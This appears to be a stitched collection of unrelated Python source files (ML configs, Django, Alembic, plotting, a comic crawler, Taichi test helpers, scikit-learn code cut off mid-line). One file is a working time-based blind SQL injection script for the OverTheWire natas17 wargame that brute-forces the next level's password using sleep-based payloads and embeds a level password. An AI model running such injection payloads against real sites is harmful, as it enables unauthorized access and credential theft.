#!/usr/bin/env python __author__ = "Mari Wahl" __copyright__ = "Copyright 2014" __credits__ = ["Mari Wahl"] __license__ = "GPL" __version__ = "2.0" __maintainer__ = "Mari Wahl" __email__ = "marina.w4hl@gmail.com" ''' this should be automatize, declare everything like this is terrible, but it was for historical reasons''' PERCENTAGE = 0.8 INPUT_FOLDER = '../../data/divide_train_test/' OUTPUT_FOLDER = "../../data/normalize_data/" NORM_TYPE = ['gauss', 'xmin', 'none']
nilq/baby-python
python
""" This file contains form classes for abstracting forms across picbackend app """ from django.forms import ModelForm from picmodels.models import NavMetricsLocation class NavMetricsLocationForm(ModelForm): # country = ModelChoiceField(queryset=Country.objects.all(), empty_label="Choose Country", to_field_name="name") # def __init__(self, *args, **kwargs): # super(NavMetricsLocationForm, self).__init__(*args, **kwargs) # self.fields['country'].label_from_instance = lambda obj: "%s" % obj.name class Meta: model = NavMetricsLocation fields = ["name", "address"]
nilq/baby-python
python
# Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Optimize Queries Revision ID: 08447ab49999 Revises: 06bfbc92f67d Create Date: 2018-11-10 20:37:11.391545 """ from alembic import op revision = "08447ab49999" down_revision = "06bfbc92f67d" def upgrade(): op.create_index( op.f("ix_projects_sitemap_bucket"), "projects", ["sitemap_bucket"], unique=False ) op.create_index( op.f("ix_users_sitemap_bucket"), "users", ["sitemap_bucket"], unique=False ) op.create_index( "journakls_submitted_date_id_idx", "journals", ["submitted_date", "id"], unique=False, ) op.create_index(op.f("ix_projects_created"), "projects", ["created"], unique=False) def downgrade(): op.drop_index(op.f("ix_projects_created"), table_name="projects") op.drop_index("journakls_submitted_date_id_idx", table_name="journals") op.drop_index(op.f("ix_users_sitemap_bucket"), table_name="users") op.drop_index(op.f("ix_projects_sitemap_bucket"), table_name="projects")
nilq/baby-python
python
#************************************************************************** #* Copyright(c) 1998-2014, ALICE Experiment at CERN, All rights reserved. * #* * #* Author: The ALICE Off-line Project. * #* Contributors are mentioned in the code where appropriate. * #* * #* Permission to use, copy, modify and distribute this software and its * #* documentation strictly for non-commercial purposes is hereby granted * #* without fee, provided that the above copyright notice appears in all * #* copies and that both the copyright notice and this permission notice * #* appear in the supporting documentation. The authors make no claims * #* about the suitability of this software for any purpose. It is * #* provided "as is" without express or implied warranty. * #************************************************************************** from PWGJE.EMCALJetTasks.Tracks.analysis.base.Graphics import GraphicsObject,SinglePanelPlot from ROOT import TFile class ComparisonObject(object): """ Base entry type for object inside comparison data """ def __init__(self, data, style): self.__data = data self.__style = style def GetData(self): return self.__data def GetGraphicsObject(self): return GraphicsObject(self.__data, self.__style) def GetRootPrimitive(self): self.__data.SetName(self.GetObjectName()) return self.__data def Draw(self, pad, addToLegend = True): pad.DrawGraphicsObject(self.GetGraphicsObject(), addToLegend, self.GetLegendTitle()) def GetLegendTitle(self): """ To be implemented in inheriting classes """ return "" def GetObjectName(self): """ To be implemented in inheriting classes """ return "" class ComparisonData(object): """ General comparison data collection """ def __init__(self): """ Constructor """ self.__entries = [] def GetEntries(self): return self.__entries def AddEntry(self, entry): self.__entries.append(entry) def DrawObjects(self, pad, addToLegend = True): for entry in self.__entries: entry.Draw(pad, addToLegend) def GetListOfRootObjects(self): """ Get a list of root-primitive trigger efficiencies """ rootprimitives = [] for entry in self.__entries: rootprimitives.append(entry.GetRootPrimitive()) return rootprimitives class ComparisonPlot(SinglePanelPlot): """ General comparison plot type """ def __init__(self): """ Constructor """ SinglePanelPlot.__init__(self) self.__frame = None self._comparisonContainer = None # be specified in inheriting classes self.__legendAttributes = None self.__padattributes = {"logx":False, "logy":False, "gridx":False, "gridy":False} def SetFrame(self, frame): self.__frame = frame def SetLegendAttributes(self, xmin, ymin, xmax, ymax): self.__legendAttributes = {"xmin":xmin, "xmax":xmax, "ymin":ymin, "ymax":ymax} def SetPadAttributes(self, logx, logy, gridx, gridy): self.__padattributes["logx"] = logx self.__padattributes["logy"] = logy self.__padattributes["gridx"] = gridx self.__padattributes["gridy"] = gridy def _Create(self, canvasname, canvastitle): """ Make the plot """ self._OpenCanvas(canvasname, canvastitle) pad = self._GetFramedPad() if self.__padattributes["logx"]: pad.GetPad().SetLogx() if self.__padattributes["logy"]: pad.GetPad().SetLogy() pad.DrawFrame(self.__frame) doLegend = False if self.__legendAttributes: doLegend = True self._comparisonContainer.DrawObjects(pad, doLegend) if doLegend: pad.CreateLegend(self.__legendAttributes["xmin"], self.__legendAttributes["ymin"], self.__legendAttributes["xmax"], self.__legendAttributes["ymax"]) def WriteData(self, rootfilename): """ Write out trigger efficiency curves to a root file """ outputfile = TFile(rootfilename, "RECREATE") for rootprim in self._comparisonContainer.GetListOfRootObjects(): rootprim.Write() outputfile.Close()
nilq/baby-python
python
import re import difflib import collections from . import ComicBookCrawlerBase, ChapterItem, ComicBookItem, SearchResultItem from ..exceptions import ComicbookNotFound, ChapterNotFound class ComicBookCrawler(ComicBookCrawlerBase): SOURCE_NAME = '鼠绘漫画' SITE = "ishuhui" CHAPTER_INTERVAL_PATTERN = re.compile(r"^(?P<start_chapter_number>\d+)\-(?P<end_chapter_number>\d+)") COMIC_API_VER = None # source= qq/ishuhui CItem = collections.namedtuple("CItem", ["chapter_number", "title", "url", "source", "source_url"]) def __init__(self, comicid): super().__init__() self.comicid = comicid self.api_data = None # {int_chapter_number: CItem, } self.chapter_db = {} self.source_url = "https://www.ishuhui.com/comics/anime/{}".format(comicid) @property def api_url(self): # https://prod-api.ishuhui.com/ver/8a175090/anime/detail?id=1&type=comics&.json return "https://prod-api.ishuhui.com/ver/{ver}/anime/detail?id={comicid}&type=comics&.json"\ .format(ver=self.get_comics_api_ver(), comicid=self.comicid) @classmethod def get_comics_api_ver(cls): if cls.COMIC_API_VER is None: url = "https://prod-u.ishuhui.com/ver" data = cls.get_json(url) cls.COMIC_API_VER = data["data"]["comics"] return cls.COMIC_API_VER def get_api_data(self): if self.api_data is None: self.api_data = self.get_json(url=self.api_url) if not self.api_data.get("data"): msg = "资源未找到! site={} comicid={}".format(self.SITE, self.comicid) raise ComicbookNotFound(msg) return self.api_data def get_comicbook_item(self): api_data = self.get_api_data() name = api_data['data']['name'] desc = api_data['data']['desc'] or "" desc = desc.replace("<p>", "") desc = desc.replace("</p>", "") tag = api_data['data']['tag'] chapter_db = self.get_chapter_db() cover_image_url = api_data['data']['thumbComics'] author = api_data['data']['authorName'] chapters = [] for chapter_number, item in chapter_db.items(): chapter = ComicBookItem.create_chapter(chapter_number=chapter_number, title=item.title) chapters.append(chapter) return ComicBookItem(name=name, desc=desc, tag=tag, cover_image_url=cover_image_url, author=author, source_url=self.source_url, source_name=self.SOURCE_NAME, chapters=chapters) def get_chapter_item(self, chapter_number): chapter_db = self.get_chapter_db() if chapter_number not in chapter_db: msg = "资源未找到! site={} comicid={} chapter_number={}".format(self.SITE, self.comicid, chapter_number) raise ChapterNotFound(msg) item = chapter_db[chapter_number] if item.source == "qq": html = self.get_html(item.url) chapter_item = self.parser_qq_source(html, source_url=item.source_url) return chapter_item if item.source == "ishuhui": chapter_api_data = self.get_json(item.url) chapter_item = self.parser_ishuihui_source(chapter_api_data, source_url=item.source_url) return chapter_item def get_chapter_db(self): if self.chapter_db: return self.chapter_db api_data = self.get_api_data() for interval, items in api_data['data']['comicsIndexes']['1']['nums'].items(): for str_chapter_number, chapter_data_sources in items.items(): # str_chapter_number = "1-8" # str_chapter_number = "9-17" r = self.CHAPTER_INTERVAL_PATTERN.search(str_chapter_number) if r: chapter_number = int(r.group("start_chapter_number")) else: chapter_number = int(str_chapter_number) # chapter_source = {int_source_id : chapter_data} chapter_source = {} for chapter_data in chapter_data_sources: source_id = chapter_data['sourceID'] chapter_source[source_id] = chapter_data # sourceID = 2 腾讯漫画源 if 2 in chapter_source: chapter_data = chapter_source[2] # http://ac.qq.com/ComicView/index/id/505430/cid/1 qq_source_url = chapter_data['url'] qq_source_url = qq_source_url.replace("http://", "https://", 1) self.chapter_db[chapter_number] = self.CItem(chapter_number=chapter_number, title=chapter_data['title'], url=qq_source_url, source_url=qq_source_url, source="qq") continue # sourceID = 1/5/7 站内资源 chapter_data = None if 1 in chapter_source: chapter_data = chapter_source[1] elif 5 in chapter_source: chapter_data = chapter_source[5] elif 7 in chapter_source: chapter_data = chapter_source[7] if chapter_data: cid = chapter_data['id'] # 页面 https://www.ishuhui.com/comics/detail/11196 # api https://prod-api.ishuhui.com/comics/detail?id=11196 url = "https://prod-api.ishuhui.com/comics/detail?id={}".format(cid) source_url = "https://www.ishuhui.com/comics/detail/{}".format(cid) self.chapter_db[chapter_number] = self.CItem(chapter_number=chapter_number, title=chapter_data['title'], url=url, source="ishuhui", source_url=source_url) continue # sourceID = 6 百度网盘 if 6 in chapter_source: pass return self.chapter_db @classmethod def parser_ishuihui_source(cls, chapter_api_data, source_url=None): # https://prod-api.ishuhui.com/comics/detail?id=11196 image_urls = [item['url'] for item in chapter_api_data['data']['contentImg']] chapter_title = chapter_api_data['data']['title'] chapter_number = chapter_api_data['data']['numberStart'] return ChapterItem(chapter_number=chapter_number, title=chapter_title, image_urls=image_urls, source_url=source_url) @classmethod def parser_qq_source(self, chapter_page_html, source_url=None): # https://ac.qq.com/ComicView/index/id/505430/cid/1 from .qq import ComicBookCrawler as QQComicBookCrawler return QQComicBookCrawler.parser_chapter_page(chapter_page_html, source_url=source_url) @classmethod def search(cls, name): url = "https://prod-api.ishuhui.com/ver/{}/comics/list?page=1&pageSize=100&toView=true&.json"\ .format(cls.get_comics_api_ver()) data = cls.get_json(url) rv = [] for item in data["data"]["data"]: comicid = item.get('animeID') _name = item.get('title') # cover_image_url = item.get('thumb') cover_image_url = item.get('animeThumb') source_url = "https://www.ishuhui.com/comics/anime/{}".format(comicid) search_result_item = SearchResultItem(site=cls.SITE, name=_name, comicid=comicid, cover_image_url=cover_image_url, source_url=source_url) rv.append(search_result_item) return sorted(rv, key=lambda x: difflib.SequenceMatcher(None, name, x.name).ratio(), reverse=True)
nilq/baby-python
python
import paddle import pit import numpy as np from reprod_log import ReprodLogger # import argparse from DeiT.losses import DistillationLoss from DeiT.regnet import build_regnet as build_teacher_model from DeiT.losses import DistillationLoss ,SoftTargetCrossEntropyLoss reprod_logger = ReprodLogger() # 定义加载模型 model = pit.pit_ti(pretrained=False) model.set_state_dict(paddle.load('./pit_ti_730.pdparams')) # 载入数据 fake_data = np.load("fake_data.npy") fake_label = np.load("fake_label.npy") images = paddle.to_tensor(fake_data) target = paddle.to_tensor(fake_label) # 定义优化器 model_without_ddp = model #optimizer = create_optimizer(args, model_without_ddp) optimizer = paddle.optimizer.AdamW( parameters=model.parameters(), learning_rate=0.0005, beta1=0.9, beta2=0.999, weight_decay=0.05, epsilon=0.1, grad_clip=None, ) model.eval() # 手动处理dropout层 loss_list = [] criterion = SoftTargetCrossEntropyLoss() teacher_model = build_teacher_model() # print(teacher_model) for i in range(5): output = model(images) dis = DistillationLoss(criterion ,teacher_model ,"none" ,0.5 ,1.0) # print('out-before: ', out.detach()) # print('target-before: ', paddle.to_tensor(fake_label).detach()) loss = dis(images, output, target.astype('float64')) # loss = DistillationLoss(fake_data,output,target) loss.backward() optimizer.step() optimizer.clear_grad() loss_list.append(loss.detach()) print("loss= ",loss.detach()) reprod_logger.add("loss_{i}", loss.cpu().detach().numpy()) reprod_logger.save('bp_align_paddle.npy')
nilq/baby-python
python
import copy import itertools from taichi.core import ti_core as _ti_core import taichi as ti # Helper functions def get_rel_eps(): arch = ti.cfg.arch if arch == ti.opengl: return 1e-3 elif arch == ti.metal: # Debatable, different hardware could yield different precisions # On AMD Radeon Pro 5500M, 1e-6 works fine... # https://github.com/taichi-dev/taichi/pull/1779 return 1e-4 return 1e-6 def approx(expected, **kwargs): '''Tweaked pytest.approx for OpenGL low precisions''' import pytest class boolean_integer: def __init__(self, value): self.value = value def __eq__(self, other): return bool(self.value) == bool(other) def __ne__(self, other): return bool(self.value) != bool(other) if isinstance(expected, bool): return boolean_integer(expected) kwargs['rel'] = max(kwargs.get('rel', 1e-6), get_rel_eps()) return pytest.approx(expected, **kwargs) def allclose(x, y, **kwargs): '''Same as: x == approx(y, **kwargs)''' return x == approx(y, **kwargs) def make_temp_file(*args, **kwargs): '''Create a temporary file''' import os from tempfile import mkstemp fd, name = mkstemp(*args, **kwargs) os.close(fd) return name class TestParam: def __init__(self, value, required_extensions): self._value = value self._required_extensions = required_extensions @property def value(self): return self._value @property def required_extensions(self): return self._required_extensions _test_features = { #"packed": # [TestValue(True, []), # TestValue(False, [])], "dynamic_index": [TestParam(True, [ti.extension.dynamic_index]), TestParam(False, [])] } def test(arch=None, exclude=None, require=None, **options): ''' .. function:: ti.test(arch=[], exclude=[], require=[], **options) :parameter arch: backends to include :parameter exclude: backends to exclude :parameter require: extensions required :parameter options: other options to be passed into ``ti.init`` ''' if arch is None: arch = [] if exclude is None: exclude = [] if require is None: require = [] if not isinstance(arch, (list, tuple)): arch = [arch] if not isinstance(exclude, (list, tuple)): exclude = [exclude] if not isinstance(require, (list, tuple)): require = [require] supported_archs = ti.supported_archs() if len(arch) == 0: arch = supported_archs else: arch = list(filter(lambda x: x in supported_archs, arch)) def decorator(foo): import functools @functools.wraps(foo) def wrapped(*args, **kwargs): arch_params_sets = [arch, *_test_features.values()] arch_params_combinations = list( itertools.product(*arch_params_sets)) for arch_params in arch_params_combinations: req_arch, req_params = arch_params[0], arch_params[1:] if (req_arch not in arch) or (req_arch in exclude): continue if not all( _ti_core.is_extension_supported(req_arch, e) for e in require): continue skip = False current_options = copy.deepcopy(options) for feature, param in zip(_test_features, req_params): value = param.value required_extensions = param.required_extensions if current_options.get(feature, value) != value or any( not _ti_core.is_extension_supported(req_arch, e) for e in required_extensions): skip = True else: # Fill in the missing feature current_options[feature] = value if skip: continue ti.init(arch=req_arch, **current_options) foo(*args, **kwargs) ti.reset() return wrapped return decorator __all__ = [ 'get_rel_eps', 'approx', 'allclose', 'make_temp_file', 'test', ]
nilq/baby-python
python
from lxml import etree, objectify class norm_attribute: def __remove_attributes_node(self, mt_node): if not mt_node.attrib: return True for at in mt_node.attrib.keys(): del mt_node.attrib[at] def __remove_attributes_tree(self, mt_tree): self.__remove_attributes_node(mt_tree) for child in mt_tree: self.__remove_attributes_tree(child) def normalize(self, mt_string): mt_tree = etree.fromstring(mt_string) self.__remove_attributes_tree(mt_tree) objectify.deannotate(mt_tree, cleanup_namespaces=True) return etree.tostring(mt_tree)
nilq/baby-python
python
import os from pysigtool import extract_authenticode def test_extract_authenticode() -> None: script_dir: str = os.path.abspath(os.path.dirname(__file__)) input_bin: str = os.path.join(script_dir, "msvcr120.dll") output_der: str = os.path.join( script_dir, "msvcr120.dll".replace(".", "_") + ".der" ) ref_der: str = os.path.join(script_dir, "ref.der") extract_authenticode(input_bin) with open(output_der, "rb") as fin0, open(ref_der, "rb") as fin1: assert fin0.read() == fin1.read()
nilq/baby-python
python
''' Export/Spreadsheet/spreadsheetrow _________________________________ Base object for generating spreadsheet data rows. :copyright: (c) 2015 The Regents of the University of California. :license: GNU GPL, see licenses/GNU GPLv3.txt for more details. ''' # load modules/submodules from xldlib.qt.objects import base # DATA # ---- ATTR_TYPES = { 'search': "Search Name", 'fraction': "File Name", 'project': "Project Name", 'ms1': "MS1 Scans Name", 'scans': "MS Scans Name", 'precursor': "Precursor Scans Name", 'product': "Product Scans Name", 'matched': "Matched Output Name", 'runtime': "Runtime" } DATA_TYPES = { 'num': "Product Scan", 'peptide': "DB Peptide", 'start': "Start", 'id': "Subunit", 'name': "Subunit Name", 'preferred': "Common/Gene Name", 'mz': "MS3 m/z", 'z': "MS3 z", 'ppm': "MS3 PPM", 'score': "MS3 Score", 'ev': "MS3 EV", 'rank': "Search Rank", 'precursor_num': "Precursor Scan", 'precursor_rt': "Precursor RT", 'precursor_mz': "MS2 m/z", 'precursor_z': "MS2 z", # MS1 data is added after data extraction # 'ms1_num': "MS1 Scan", # 'ms1_rt': "MS1 RT" } REPORTER_TYPES = { 'ratio': "{reporterion} Ratios", 'mz': "{reporterion} m/z", 'intensity': "{reporterion} Intensity", } # BASE # ---- class SpreadsheetRow(base.BaseObject): '''Shared methods for processing invididual rows of spreadsheet data''' def __init__(self, row): super(SpreadsheetRow, self).__init__() self.row = row source = self.app.discovererthread self.reporterion = source.matched.reporterion.name # SETTERS def setattrs(self, values): '''Sets the file data for a given scan''' for key, column in ATTR_TYPES.items(): values[column] = [self.row.data['attrs'].get(key, '')] def setdata(self, values, indexes): '''Converts the variable length array types to spreadsheet values''' for key, column in DATA_TYPES.items(): values[column] = list(self.row.data.getcolumn(indexes, key)) def setreporter(self, values, indexes): '''Converts the report ion data to spreadsheet values''' items = list(self.row.data.getcolumn(indexes, 'reporter')) for key, column in REPORTER_TYPES.items(): strs = [i.tostr(key) if i is not None else '' for i in items] formatted = column.format(reporterion=self.reporterion) values[formatted] = strs def setreporternull(self, values, indexes): '''Sets null values if report ion quantitation is inactive''' for key, column in REPORTER_TYPES.items(): formatted = column.format(reporterion=self.reporterion) values[formatted] = [float('nan')] * len(indexes)
nilq/baby-python
python
expected_output={ 'tunnel_id': { 1: { 'active_time': 2856, 'auth_sign': 'psk', 'auth_verify': 'psk', 'ce_id': 1406, 'cisco_trust_security_sgt': 'disabled', 'dh_grp': 20, 'dpd_configured_time': 10, 'dynamic_route_update': 'enabled', 'encryption': 'aes-gcm', 'extended_authentication': 'not configured', 'fragmentation': 'not configured', 'fvrf': 'none', 'hash': 'none', 'initiator_of_sa': 'yes', 'ivrf': 'none', 'keysize': 256, 'life_time': 86400, 'local': '4.4.4.1/4500', 'local_id': '4.4.4.1', 'local_next_msg_id': 288, 'local_reg_msg_id': 288, 'local_req_queued': 288, 'local_spi': '409A5870608E1C87', 'local_window': 5, 'nat_t': 'detected inside', 'prf': 'sha384', 'pushed_ip': '66.6.6.4', 'remote': '10.1.1.1/4500', 'remote_id': '10.1.1.1', 'remote_next_msg_id': 285, 'remote_req_msg_id': 285, 'remote_req_queued': 285, 'remote_spi': '20858C98BE7EE1A9', 'remote_subnets': [], 'remote_window': 5, 'retry': 2, 'session_id': 60, 'status': 'ready', 'status_description': 'negotiation done', }, }, }
nilq/baby-python
python
#!/usr/bin/env python import requests possible_chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' password = '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw' auth=('natas17', password) used_chars = '' for char in possible_chars: payload = {'username': ('natas18" AND password LIKE BINARY "%%%c%%" and sleep(5) and "1"="1' % char)} try: r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=auth, data=payload, timeout=1) except requests.exceptions.Timeout: used_chars += char print used_chars cracked_pass = '' for i in range(32): print i for char in used_chars: new_pass = cracked_pass + char payload = {'username': ('natas18" AND password LIKE BINARY "%s%%" and sleep(5) and "1"="1' % new_pass)} try: r = requests.post( 'http://natas17.natas.labs.overthewire.org/index.php', auth=auth, data=payload, timeout=1) except requests.exceptions.Timeout: cracked_pass += char print cracked_pass + "*" * (32 - len(cracked_pass)) break
nilq/baby-python
python
from .data_wrangling import dip2strike from .data_wrangling import strike2dipaz from .data_wrangling import xyzinterp from .data_wrangling import linear_interpolate_2dp from .geometric_bias import unitvectorx from .geometric_bias import unitvectory from .geometric_bias import unitvectorz from .geometric_bias import isogeniccontour from .mohr_plot import sigma_m from .mohr_plot import tau_s from .mohr_plot import sigma_n from .mohr_plot import mohr3d from .hoop_stress import thermal_stress from .hoop_stress import theta from .hoop_stress import effhoopstress from .transform_stress_tensor import Rs from .transform_stress_tensor import Rf from .transform_stress_tensor import rake from .transform_stress_tensor import Rt from .transform_stress_tensor import fracture_sn_tau from .stress_models import linear_Sv from .stress_polygon import minstress from .stress_polygon import maxstress from .stress_polygon import poly __version__ = '0.1-dev' __all__ = [ 'dip2strike', # data_wrangling 'strike2dipaz', 'xyzinterp', 'linear_interpolate_2dp', 'unitvectorx', # geometric_bias 'unitvectory', 'unitvectory', 'unitvectorz', 'isogeniccontour', 'sigma_m', # mohr_plot 'tau_s', 'sigma_n', 'mohr3d', 'thermal_stress', # hoop_stress 'theta', 'effhoopstress', 'Rs', # transform_stress_tensor 'Rf', 'rake', 'Rt', 'fracture_sn_tau', 'linSv', # stress_models 'minstress', 'maxstress', 'poly' ]
nilq/baby-python
python
from .base import Widget class RectangleWidget(Widget): def __init__(self, size, position=(0, 0)): super().__init__(position) self.size = size def draw(self, window): width, height = self.extent(window) window.rectangle(self.x, self.y, self.x + width - 1, self.y + height - 1) def extent(self, _): return self.size
nilq/baby-python
python
import sys import pandas as pd import numpy as np import torch from torch import nn from torch.utils.data import random_split, DataLoader from utils import ( read_glove_vector, get_one_hot_matrix, get_glove_matrix, create_emb_layer, ) from dataset import UtteranceSlotDataset from train import train from gpu import device from models import BaselineModel, RNNTwoLayerModel, GRUModel, LSTMModel # Get the raw data as pandas DataFrame train_df = pd.read_csv("hw_3_train_data.csv") # Use dataset object for preprocessing the raw data train_utterances = list(train_df["utterances"]) train_slots = list(train_df["IOB Slot tags"]) utterance_slot_dataset = UtteranceSlotDataset( train_utterances, train_slots, seq_len=int(np.max([len(sent.split()) for sent in train_utterances])) + 10, ) # split the training data into training set and validation set val_len = int(len(utterance_slot_dataset) * 0.3) train_set, val_set = random_split( utterance_slot_dataset, [len(utterance_slot_dataset) - val_len, val_len] ) # Define Global hyperparameters ## Model num_classes = len(utterance_slot_dataset.slot2idx) seq_len = utterance_slot_dataset.seq_len ## Training batch_size = 2048 # with splitting (for validation) train_loader = DataLoader( dataset=train_set, batch_size=batch_size, shuffle=True, ) # without splitting (for output test result) all_train_loader = DataLoader( dataset=utterance_slot_dataset, batch_size=batch_size, shuffle=True, ) if __name__ == "__main__": args = sys.argv embedding = args[1] model_type = args[2] train_mode = args[3] n_epochs = int(args[4]) weight_matrix = None if embedding == "one_hot": weight_matrix = get_one_hot_matrix(utterance_slot_dataset.vocab) elif embedding == "glove": glove_map = read_glove_vector("glove.6B.50d.txt") weight_matrix = get_glove_matrix( glove_map, utterance_slot_dataset.vocab ) elif embedding == "glove_100d": glove_100d_map = read_glove_vector("glove.6B.100d.txt") weight_matrix = get_glove_matrix( glove_100d_map, utterance_slot_dataset.vocab ) # create the embedding layer emb_layer, num_embeddings, embedding_dim = create_emb_layer(weight_matrix) # select models model = None if model_type == "baseline_rnn": model = BaselineModel( input_size=embedding_dim, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) elif model_type == "2_layer_rnn": model = RNNTwoLayerModel( input_size=embedding_dim, hidden_size=32, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) elif model_type == "gru": model = GRUModel( input_size=embedding_dim, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) elif model_type == "lstm": model = LSTMModel( input_size=embedding_dim, output_size=num_classes, seq_len=seq_len, emb_layer=emb_layer, ).to(device) loader = None if train_mode == "validate": loader = train_loader elif train_mode == "all": loader = all_train_loader reports = train( model=model, n_epochs=n_epochs, data_loader=loader, loss_func=nn.CrossEntropyLoss(), optimizer=torch.optim.Adam(model.parameters(), lr=0.005), val_set=val_set, dataset=utterance_slot_dataset, is_plot=True, plot_name=f"{model_type}_{embedding}", ) best_idx = int(np.argmax([report[1]["accuracy"] for report in reports])) final_val_report = reports[best_idx][1] final_val_joint_accuracy = reports[best_idx][3] print("Accuracy: ", final_val_report["accuracy"]) print("Macro F1-Score: ", final_val_report["macro avg"]["f1-score"]) print("Weighted F1-Score: ", final_val_report["weighted avg"]["f1-score"]) print("Joint Accuracy: ", final_val_joint_accuracy) print("Best Epoch: ", best_idx * 10)
nilq/baby-python
python
from bokeh.models import FuncTickFormatter import bokeh.palettes import numpy as np logFmtr = FuncTickFormatter(code=""" var trns = [ '\u2070', '\u00B9', '\u00B2', '\u00B3', '\u2074', '\u2075', '\u2076', '\u2077', '\u2078', '\u2079']; var tick_power = Math.floor(Math.log10(tick)); var tick_mult = Math.pow(10, Math.log10(tick) - tick_power); var ret = ''; if (tick_mult > 1.) { if (Math.abs(tick_mult - Math.round(tick_mult)) > 0.05){ ret = tick_mult.toFixed(1) + '\u22C5'; } else { ret = tick_mult.toFixed(0) +'\u22C5'; } } ret += '10'; if (tick_power < 0){ ret += '\u207B'; tick_power = -tick_power; } power_digits = [] while (tick_power > 9){ power_digits.push( tick_power - Math.floor(tick_power/10)*10 ) tick_power = Math.floor(tick_power/10) } power_digits.push(tick_power) for (i = power_digits.length-1; i >= 0; i--){ ret += trns[power_digits[i]]; } return ret; """) pal = bokeh.palettes.colorblind['Colorblind'][8] pl = [pal[0], pal[1], pal[3]] pl.extend(pal[4:8]) pl.append('#d62728') pal = pl def plot_gaussian(plot, mup, Sigp, Sig, color, dotsize, linewidth, dotalpha, linealpha, line_dash, name): plot.circle(mup[0], mup[1], color=color, size=dotsize, alpha=dotalpha) t = np.linspace(0., 2*np.pi, 100) t = np.array([np.cos(t), np.sin(t)]) t = 3*np.linalg.cholesky(Sigp+Sig).dot(t) + mup[:, np.newaxis] plot.line(t[0, :], t[1, :], color=color, line_width=linewidth, alpha=linealpha, line_dash=line_dash, legend=name) def plot_meanstd(plot, x, ys, color, linewidth, alpha, line_dash, name): plot.line(x, ys.mean(axis=0), color=color, line_width=linewidth, line_dash=line_dash, legend=nm) plot.patch(np.hstack((x, x[::-1])), np.hstack(( ys.mean(axis=0)-ys.std(axis=0), (ys.mean(axis=0)+ys.std(axis=0))[::-1] )), color=color, line_width=linewidth/2, line_dash=line_dash, alpha=alpha, legend=nm) def plot_medianquartiles(plot, x, ys, color, linewidth, alpha, line_dash, name): ys25 = np.percentile(ys, 49, axis=0) ys50 = np.percentile(ys, 50, axis=0) ys75 = np.percentile(ys, 51, axis=0) plot.line(x, ys25, color=color, line_width=linewidth, line_dash=line_dash, legend=nm) plot.line(x, ys50, color=color, line_width=linewidth, line_dash=line_dash, legend=nm) plot.line(x, ys75, color=color, line_width=linewidth, line_dash=line_dash, legend=nm) #plot.patch(np.hstack((x, x[::-1])), np.hstack(( ys25, ys75[::-1] )), color=color, line_width=linewidth/2, line_dash=line_dash, alpha=alpha, legend=nm) def preprocess_plot(fig, axis_font_size, log_scale_x, log_scale_y): fig.xaxis.axis_label_text_font_size= axis_font_size fig.xaxis.major_label_text_font_size= axis_font_size fig.yaxis.axis_label_text_font_size= axis_font_size fig.yaxis.major_label_text_font_size= axis_font_size if log_scale_y: fig.yaxis.formatter = logFmtr if log_scale_x: fig.xaxis.formatter = logFmtr #fig.toolbar.logo = None #fig.toolbar_location = None def postprocess_plot(fig, legend_font_size, orientation='vertical', location='top_right', glyph_width=80): fig.legend.label_text_font_size= legend_font_size fig.legend.orientation=orientation fig.legend.location=location fig.legend.glyph_width=glyph_width fig.legend.glyph_height=40 fig.legend.spacing=5 fig.xgrid.grid_line_color=None fig.ygrid.grid_line_color=None
nilq/baby-python
python
from sklearn.kernel_approximation import (RBFSampler,Nystroem) from sklearn.ensemble import RandomForestClassifier import pandas import numpy as np import random from sklearn.svm import SVC from sklearn.metrics.pairwise import rbf_kernel,laplacian_kernel,chi2_kernel,linear_kernel,polynomial_kernel,cosine_similarity from sklearn import preprocessing from sklearn.model_selection import GridSearchCV import xlrd import xlrd import numpy as np import pandas import random import time from sklearn.metrics import accuracy_score from sklearn import model_selection from sklearn.ensemble import RandomForestClassifier from sklearn.feature_selection import RFE from sklearn.svm import SVC from sklearn.externals import joblib from sklearn.pipeline import make_pipeline from skrebate import ReliefF from sklearn.discriminant_analysis import LinearDiscriminantAnalysis from sklearn.metrics import roc_auc_score from sklearn.neighbors import KNeighborsClassifier from sklearn.model_selection import GridSearchCV from sklearn import preprocessing from collections import Counter import re from math import floor from joblib import Parallel, delayed np.set_printoptions(threshold=np.nan) def floored_percentage(val, digits): val *= 10 ** (digits + 2) return '{1:.{0}f}\%\pm '.format(digits, floor(val) / 10 ** digits) def splitdata(X,Y,ratio,seed): '''This function is to split the data into train and test data randomly and preserve the pos/neg ratio''' n_samples = X.shape[0] y = Y.astype(int) y_bin = np.bincount(y) classes = np.nonzero(y_bin)[0] #fint the indices for each class indices = [] print() for i in classes: indice = [] for j in range(n_samples): if y[j] == i: indice.append(j) #print(len(indice)) indices.append(indice) train_indices = [] for i in indices: k = int(len(i)*ratio) train_indices += (random.Random(seed).sample(i,k=k)) #find the unused indices s = np.bincount(train_indices,minlength=n_samples) mask = s==0 test_indices = np.arange(n_samples)[mask] return train_indices,test_indices """ def rf_dis(n_trees, X,Y,train_indices,test_indices,seed,wei): clf = RandomForestClassifier(n_estimators=n_trees, random_state=seed, oob_score=False, n_jobs=1) clf = clf.fit(X[train_indices], Y[train_indices]) pred = clf.predict(X[test_indices]) prediction = clf.predict(X) prob = clf.predict_proba(X[test_indices]) weight =0#clf.oob_score_ #clf.score(X[test_indices], Y[test_indices]) #print(clf.score(X[train_indices], Y[train_indices])) #print(1 - clf.oob_score_) n_samples = X.shape[0] trees = clf.estimators_ dis = np.zeros((n_samples,n_samples)) for i in range(n_samples): dis[i][i] = 1 res = clf.apply(X) www = wei pre = np.zeros((n_trees, n_samples)) pre = pre.transpose() for i in range(n_samples): for j in range(i+1,n_samples): a = np.ravel(res[i]) b = np.ravel(res[j]) c = np.ravel(pre[i]) d = np.ravel(pre[j]) score = 0 for k in range(n_trees): if a[k] == b[k]: s1=1 else: s1 = 0 if c[k] == 